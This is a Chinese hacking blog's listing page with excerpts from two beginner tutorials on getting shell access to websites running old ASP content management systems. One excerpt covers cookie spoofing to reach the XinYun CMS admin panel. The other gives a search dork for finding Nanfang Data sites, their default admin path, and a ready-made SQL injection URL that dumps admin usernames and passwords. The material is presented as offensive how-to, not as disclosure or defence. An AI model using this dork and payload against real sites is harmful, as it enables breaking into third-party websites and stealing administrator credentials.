• 新云网站管理系统后台拿shell

    新云网站管理系统后台拿shell
    影响范围:全ACCESS版本,SQL未测试。 新云网站管理系统是现在比较流行的cms系统,功能也算强大,但由于ASP语言本身的安全环境不是很好,所以漏洞多多也不新鲜,我这里一共发现了两个安全隐患,应该说是致命的。   一、COOKIES欺骗,进入后台。 大家都知道,一般的后台密码都是MD5加密的,如果管理员把密码设置的复杂一点,即使你在聪明,恐怕也要用个一年半载才能破解出来...阅读全文
    作者:qxz_xp | 发布:2013年8月28日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 南方数据网站漏洞

    南方数据网站漏洞
    漏洞影响版本 v10.0 v11.0 关键字:inurl:”HomeMarket.asp” 默认后台:/admin 直接爆用户密码: http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’ 拿shell方法貌似有4种: 1、注册用户上传拿shell,这...阅读全文
    作者:qxz_xp | 发布:2013年7月28日 | 分类:菜鸟入门, 黑客攻防 | 1条评论
    阅读全文